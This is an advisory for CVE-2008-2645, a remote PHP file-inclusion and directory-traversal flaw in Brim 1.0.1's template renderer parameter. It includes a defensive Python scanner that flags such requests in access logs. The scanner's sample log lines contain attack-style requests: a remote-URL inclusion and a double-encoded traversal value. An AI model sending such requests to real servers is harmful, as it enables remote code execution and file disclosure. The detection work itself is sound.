Brim · CVE-2008-2645
**Name of the Vulnerable Software and Affected Versions**
Brim (formerly Booby) version 1.0.1
**Description**
Brim 1.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the `renderer` parameter to `template.tpl.php` in various templates, including `barrel/`, `barry/`, `mylook/`, `oerdec/`, `penguin/`, `sidebar/`, `slashdot/`, and `text-only/`. The same parameter can also be used to include and execute arbitrary local files via directory traversal sequences.
**Recommendations**
For Brim (formerly Booby) version 1.0.1, consider restricting access to the `template.tpl.php` file in the affected templates to minimize the risk of exploitation. As a temporary workaround, avoid using the `renderer` parameter in the `template.tpl.php` file until a patch is available.
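To check whether the affected files are being requested with a `renderer` value, the following added example (not part of the original advisory or of Brim) scans web server access log lines for requests to `template.tpl.php` in the listed template directories and classifies the `renderer` value. It assumes combined-format access logs; the sample lines, the `/brim/templates/` path prefix and the host names are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Template directories named in the advisory.
TEMPLATES = ("barrel", "barry", "mylook", "oerdec", "penguin",
             "sidebar", "slashdot", "text-only")
TARGET = re.compile(r"/(?:%s)/template\.tpl\.php$" % "|".join(map(re.escape, TEMPLATES)))
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)  # http:, ftp:, php:, data: ...

# Constructed sample lines; the /brim/templates/ prefix and hosts are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2008:10:00:00 +0000] "GET /brim/templates/barry/template.tpl.php?renderer=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jun/2008:10:00:05 +0000] "GET /brim/templates/sidebar/template.tpl.php?renderer=..%252f..%252fsecret.txt HTTP/1.1" 200 1024',
    '192.0.2.12 - - [01/Jun/2008:10:00:09 +0000] "GET /brim/index.php?plugin=bookmarks HTTP/1.1" 200 2048',
]


def classify(value):
    """Return why a renderer value looks like an inclusion attempt, or None."""
    for _ in range(3):  # bounded re-decoding exposes double-encoded input
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if SCHEME.match(value) or value.startswith("//"):
        return "remote-url"
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    return None


def scan(lines):
    """Yield (line_no, reason, value); assumes normal use never sets renderer here."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not TARGET.search(unquote(url.path)):
            continue
        for value in parse_qs(url.query).get("renderer", []):
            yield n, classify(value) or "renderer-set", value


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Values sent in a POST body do not appear in the access log, so this only covers the query string.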